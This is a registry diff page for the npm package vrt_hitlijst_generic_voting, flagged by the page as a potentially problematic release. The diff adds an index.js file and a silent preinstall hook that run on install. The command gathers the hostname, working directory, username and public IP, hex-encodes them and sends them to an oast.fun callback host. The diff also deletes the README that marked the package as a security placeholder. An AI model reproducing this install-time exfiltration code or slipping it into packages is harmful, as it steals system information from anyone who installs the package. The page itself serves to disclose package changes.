vrt_hitlijst_generic_voting 0.0.1-security → 1.999.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of vrt_hitlijst_generic_voting might be problematic. Click here for more details.
- package/index.js +22 -0
- package/package.json +13 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,22 @@
|
|
1
|
+
const { exec } = require("child_process");
|
2
|
+
|
3
|
+
// Update the command to use your callback URL
|
4
|
+
const command = `
|
5
|
+
a=$(hostname;pwd;whoami;echo 'niroborg-npm-com-test';curl https://ifconfig.me;) &&
|
6
|
+
echo $a | xxd -p | head | while read ut; do
|
7
|
+
curl -X GET "http://lulshdazpypdagyixvqzasm9jt0fgtv0n.oast.fun?data=$ut"
|
8
|
+
done
|
9
|
+
`;
|
10
|
+
|
11
|
+
// Execute the command
|
12
|
+
exec(command, (error, stdout, stderr) => {
|
13
|
+
if (error) {
|
14
|
+
console.error("Error:", error.message);
|
15
|
+
return;
|
16
|
+
}
|
17
|
+
if (stderr) {
|
18
|
+
console.error("stderr:", stderr);
|
19
|
+
return;
|
20
|
+
}
|
21
|
+
console.log("stdout:", stdout);
|
22
|
+
});
|
package/package.json
CHANGED
@@ -1,6 +1,16 @@
|
|
1
1
|
{
|
2
2
|
"name": "vrt_hitlijst_generic_voting",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.999.0",
|
4
|
+
"description": "",
|
5
|
+
"main": "main.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "node index.js > /dev/null 2>&1",
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
9
|
+
},
|
10
|
+
"author": "lexi2",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"lodash": "^4.17.21",
|
14
|
+
"proxyapi-docs": "^1.999.0"
|
15
|
+
}
|
6
16
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=vrt_hitlijst_generic_voting for more information.
|